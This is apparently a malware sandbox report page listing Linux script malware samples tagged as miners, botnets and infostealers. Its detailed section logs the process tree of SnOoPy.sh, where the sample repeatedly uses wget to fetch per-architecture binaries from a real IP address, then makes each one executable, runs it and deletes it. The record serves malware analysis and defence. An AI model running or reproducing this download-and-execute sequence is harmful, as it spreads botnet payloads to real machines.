78276bd481a04c29109fbbd8313701e5b814165fa4b48515ec4489ccfda93107 | Triage

Submit
Reports

Overview

overview

Static

static

1

script_mal...6c1.sh

ubuntu-20.04-amd64

9

script_malware/1.sh

ubuntu-20.04-amd64

script_mal...459.sh

ubuntu-20.04-amd64

7

script_mal...ux.elf

ubuntu-20.04-amd64

1

script_mal...da.elf

ubuntu-20.04-amd64

1

script_malware/23.sh

ubuntu-20.04-amd64

script_malware/404

ubuntu-20.04-amd64

script_mal...c5b.py

ubuntu-20.04-amd64

1

script_mal...006.sh

ubuntu-20.04-amd64

script_mal...oPy.sh

ubuntu-20.04-amd64

1

script_mal...617.sh

ubuntu-20.04-amd64

script_mal...dc0.sh

ubuntu-20.04-amd64

9

script_mal...e58.sh

ubuntu-20.04-amd64

7

script_mal...d28.sh

ubuntu-20.04-amd64

7

script_mal...ail.sh

ubuntu-20.04-amd64

script_malware/rs.sh

ubuntu-20.04-amd64

6

script_mal...tup.sh

ubuntu-20.04-amd64

7

script_mal...ll.elf

ubuntu-20.04-amd64

1

script_malware/ta.sh

ubuntu-20.04-amd64

Resubmissions

15-03-2024 16:07

240315-tkykeacf7z 1

25-02-2024 14:29

240225-rtjrhaee9z 10

Analysis

max time kernel
5s
max time network
1680s
platform
ubuntu-20.04_amd64
resource
ubuntu2004-amd64-20240221-en
resource tags

arch:amd64arch:i386image:ubuntu2004-amd64-20240221-enkernel:5.4.0-169-genericlocale:en-usos:ubuntu-20.04-amd64system
submitted
25-02-2024 14:29

Sharing

Static task

static1

Behavioral task

behavioral1

Sample

script_malware/063ccf736c2c19ca5db70b8d8a7cf00377899c16023c63fee836bdefadd336c1.sh

Resource

ubuntu2004-amd64-20240221-en

infostealer persistence rootkit

ubuntu-20.04-amd64

12 signatures

1800 seconds

Behavioral task

behavioral2

Sample

script_malware/1.sh

Resource

ubuntu2004-amd64-20240221-en

xmrig antivm evasion infostealer miner persistence rootkit upx

ubuntu-20.04-amd64

20 signatures

1800 seconds

Behavioral task

behavioral3

Sample

script_malware/10c3b6b03a9bf105d264a8e7f30dcab0a6c59a414529b0af0a6bd9f1d2984459.sh

Resource

ubuntu2004-amd64-20240221-en

ubuntu-20.04-amd64

8 signatures

1800 seconds

Behavioral task

behavioral4

Sample

script_malware/164f8295_linux.elf

Resource

ubuntu2004-amd64-20240221-en

ubuntu-20.04-amd64

0 signatures

1800 seconds

Behavioral task

behavioral5

Sample

script_malware/21162bbd796ad2bf9954265276bfebea8741596e8fe9d86070245d9b5f9db6da.elf

Resource

ubuntu2004-amd64-20240221-en

ubuntu-20.04-amd64

0 signatures

1800 seconds

Behavioral task

behavioral6

Sample

script_malware/23.sh

Resource

ubuntu2004-amd64-20240221-en

xorddos antivm botnet downloader infostealer persistence

ubuntu-20.04-amd64

12 signatures

1800 seconds

Behavioral task

behavioral7

Sample

script_malware/404

Resource

ubuntu2004-amd64-20240221-en

ubuntu-20.04-amd64

0 signatures

1800 seconds

Behavioral task

behavioral8

Sample

script_malware/864d7bcd96f8cf35b9e372b6508bc6ef1a704eaaa03c34bd79577b057aebec5b.py

Resource

ubuntu2004-amd64-20240221-en

ubuntu-20.04-amd64

0 signatures

1800 seconds

Behavioral task

behavioral9

Sample

script_malware/8e27b76b3903312cc5e93f250d7cf90b7b999592d70dcf2922bb450023014006.sh

Resource

ubuntu2004-amd64-20240221-en

kinsing xmrig_linux antivm evasion infostealer loader miner persistence rootkit upx

ubuntu-20.04-amd64

25 signatures

1800 seconds

Behavioral task

behavioral10

Sample

script_malware/SnOoPy.sh

Resource

ubuntu2004-amd64-20240221-en

ubuntu-20.04-amd64

0 signatures

1800 seconds

Behavioral task

behavioral11

Sample

script_malware/a423a2a11c1904e42dc8630064e252ac4568220417a9ae072a557131e9386617.sh

Resource

ubuntu2004-amd64-20240221-en

ubuntu-20.04-amd64

0 signatures

1800 seconds

Behavioral task

behavioral12

Sample

script_malware/a58fa03638110727f4a4a227f6ec2c0dceaeb39ccee89d12a4d727bb50d29dc0.sh

Resource

ubuntu2004-amd64-20240221-en

infostealer persistence rootkit

ubuntu-20.04-amd64

13 signatures

1800 seconds

Behavioral task

behavioral13

Sample

script_malware/aa5a487db37ce176e17c7abbb2b1d460ba926344e46737f2f64b65bf5a4a3e58.sh

Resource

ubuntu2004-amd64-20240221-en

ubuntu-20.04-amd64

8 signatures

1800 seconds

Behavioral task

behavioral14

Sample

script_malware/ae4b7284a9538c66432f02097c3de14e2253d16b6602c4694753468bc14d7d28.sh

Resource

ubuntu2004-amd64-20240221-en

ubuntu-20.04-amd64

8 signatures

1800 seconds

Behavioral task

behavioral15

Sample

script_malware/redtail.sh

Resource

ubuntu2004-amd64-20240221-en

ubuntu-20.04-amd64

0 signatures

1800 seconds

Behavioral task

behavioral16

Sample

script_malware/rs.sh

Resource

ubuntu2004-amd64-20240221-en

ubuntu-20.04-amd64

5 signatures

1800 seconds

Behavioral task

behavioral17

Sample

script_malware/setup.sh

Resource

ubuntu2004-amd64-20240221-en

ubuntu-20.04-amd64

3 signatures

1800 seconds

Behavioral task

behavioral18

Sample

script_malware/shell.elf

Resource

ubuntu2004-amd64-20240221-en

ubuntu-20.04-amd64

0 signatures

1800 seconds

Behavioral task

behavioral19

Sample

script_malware/ta.sh

Resource

ubuntu2004-amd64-20240221-en

xmrig_linux antivm infostealer miner upx

ubuntu-20.04-amd64

12 signatures

1800 seconds

Report Analysis Logs

General

Target

script_malware/SnOoPy.sh
Size

2KB
MD5

f0664749e65d26335de79a90c7074d00
SHA1

0deb03914ba232314b5214803dd97b94c1c9d9e5
SHA256

57ad07730428c1412ba43f4470c2074f4f0ef4e6eb5fcd24c9e19e49028e455a
SHA512

b605e84c23dad423a5e585c49957b0ade5f8764681f010fc1d192c81f677e4a849872db8afedd262e740f648aca18649a89420a54a02f1f1bd594c2125c2b6ff

Score

1^/10

Malware Config

Signatures

Processes

/tmp/script_malware/SnOoPy.sh
/tmp/script_malware/SnOoPy.sh
1⤵
PID:1476

/usr/bin/wget
wget http://185.144.159.137/m-i.p-s.SNOOPY
2⤵
PID:1480

/usr/bin/chmod
chmod +x m-i.p-s.SNOOPY
2⤵
PID:1481

/tmp/m-i.p-s.SNOOPY
./m-i.p-s.SNOOPY
2⤵
PID:1482

/usr/bin/rm
rm -rf m-i.p-s.SNOOPY
2⤵
PID:1483

/usr/bin/wget
wget http://185.144.159.137/m-p.s-l.SNOOPY
2⤵
PID:1484

/usr/bin/chmod
chmod +x m-p.s-l.SNOOPY
2⤵
PID:1485

/tmp/m-p.s-l.SNOOPY
./m-p.s-l.SNOOPY
2⤵
PID:1486

/usr/bin/rm
rm -rf m-p.s-l.SNOOPY
2⤵
PID:1487

/usr/bin/wget
wget http://185.144.159.137/s-h.4-.SNOOPY
2⤵
PID:1488

/usr/bin/chmod
chmod +x s-h.4-.SNOOPY
2⤵
PID:1495

/tmp/s-h.4-.SNOOPY
./s-h.4-.SNOOPY
2⤵
PID:1496

/usr/bin/rm
rm -rf s-h.4-.SNOOPY
2⤵
PID:1497

/usr/bin/wget
wget http://185.144.159.137/x-8.6-.SNOOPY
2⤵
PID:1498

/usr/bin/chmod
chmod +x x-8.6-.SNOOPY
2⤵
PID:1516

/tmp/x-8.6-.SNOOPY
./x-8.6-.SNOOPY
2⤵
PID:1517

/usr/bin/rm
rm -rf x-8.6-.SNOOPY
2⤵
PID:1518

/usr/bin/wget
wget http://185.144.159.137/a-r.m-6.SNOOPY
2⤵
PID:1519

/usr/bin/chmod
chmod +x a-r.m-6.SNOOPY
2⤵
PID:1533

/tmp/a-r.m-6.SNOOPY
./a-r.m-6.SNOOPY
2⤵
PID:1534

/usr/bin/rm
rm -rf a-r.m-6.SNOOPY
2⤵
PID:1535

/usr/bin/wget
wget http://185.144.159.137/x-3.2-.SNOOPY
2⤵
PID:1536

/usr/bin/chmod
chmod +x x-3.2-.SNOOPY
2⤵
PID:1541

/tmp/x-3.2-.SNOOPY
./x-3.2-.SNOOPY
2⤵
PID:1542

/usr/bin/rm
rm -rf x-3.2-.SNOOPY
2⤵
PID:1543

/usr/bin/wget
wget http://185.144.159.137/a-r.m-7.SNOOPY
2⤵
PID:1544

/usr/bin/chmod
chmod +x a-r.m-7.SNOOPY
2⤵
PID:1559

/tmp/a-r.m-7.SNOOPY
./a-r.m-7.SNOOPY
2⤵
PID:1561

/usr/bin/rm
rm -rf a-r.m-7.SNOOPY
2⤵
PID:1562

/usr/bin/wget
wget http://185.144.159.137/p-p.c-.SNOOPY
2⤵
PID:1564

/usr/bin/chmod
chmod +x p-p.c-.SNOOPY
2⤵
PID:1606

/tmp/p-p.c-.SNOOPY
./p-p.c-.SNOOPY
2⤵
PID:1607

/usr/bin/rm
rm -rf p-p.c-.SNOOPY
2⤵
PID:1611

/usr/bin/wget
wget http://185.144.159.137/i-5.8-6.SNOOPY
2⤵
PID:1614

/usr/bin/chmod
chmod +x i-5.8-6.SNOOPY
2⤵
PID:1674

/tmp/i-5.8-6.SNOOPY
./i-5.8-6.SNOOPY
2⤵
PID:1675

/usr/bin/rm
rm -rf i-5.8-6.SNOOPY
2⤵
PID:1677

/usr/bin/wget
wget http://185.144.159.137/m-6.8-k.SNOOPY
2⤵
PID:1679

/usr/bin/chmod
chmod +x m-6.8-k.SNOOPY
2⤵
PID:1692

/tmp/m-6.8-k.SNOOPY
./m-6.8-k.SNOOPY
2⤵
PID:1694

/usr/bin/rm
rm -rf m-6.8-k.SNOOPY
2⤵
PID:1695

/usr/bin/wget
wget http://185.144.159.137/p-p.c-.SNOOPY
2⤵
PID:1696

/usr/bin/chmod
chmod +x p-p.c-.SNOOPY
2⤵
PID:1711

/tmp/p-p.c-.SNOOPY
./p-p.c-.SNOOPY
2⤵
PID:1712

/usr/bin/rm
rm -rf p-p.c-.SNOOPY
2⤵
PID:1715

/usr/bin/wget
wget http://185.144.159.137/a-r.m-4.SNOOPY
2⤵
PID:1718

/usr/bin/chmod
chmod +x a-r.m-4.SNOOPY
2⤵
PID:1763

/tmp/a-r.m-4.SNOOPY
./a-r.m-4.SNOOPY
2⤵
PID:1767

/usr/bin/rm
rm -rf a-r.m-4.SNOOPY
2⤵
PID:1769

/usr/bin/wget
wget http://185.144.159.137/a-r.m-5.SNOOPY
2⤵
PID:1772

/usr/bin/chmod
chmod +x a-r.m-5.SNOOPY
2⤵
PID:1791

/tmp/a-r.m-5.SNOOPY
./a-r.m-5.SNOOPY
2⤵
PID:1792

/usr/bin/rm
rm -rf a-r.m-5.SNOOPY
2⤵
PID:1795

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

© 2018-2024

Terms | Privacy